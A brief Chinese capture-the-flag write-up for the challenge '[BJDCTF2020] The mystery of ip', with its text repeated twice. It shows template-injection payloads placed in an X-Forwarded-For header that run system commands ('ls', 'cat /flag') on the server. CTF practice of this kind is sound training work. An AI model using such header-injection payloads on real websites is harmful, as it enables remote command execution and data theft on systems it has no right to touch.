上班
1.[BJDCTF2020]The mystery of ip
考点:ssti模板注入
开局看见flag 再根据题目应该是从ip入手(背景图还不错
点进flag确实是看见了ip
抓包没看见有X-Forwarded-For:
就自己写上吧
X-Forwarded-For:{system("ls")}
注
X-Forwarded-For:{system('cat /flag')}
上班
考点:ssti模板注入
开局看见flag 再根据题目应该是从ip入手(背景图还不错
点进flag确实是看见了ip
抓包没看见有X-Forwarded-For:
就自己写上吧
X-Forwarded-For:{system("ls")}
注
X-Forwarded-For:{system('cat /flag')}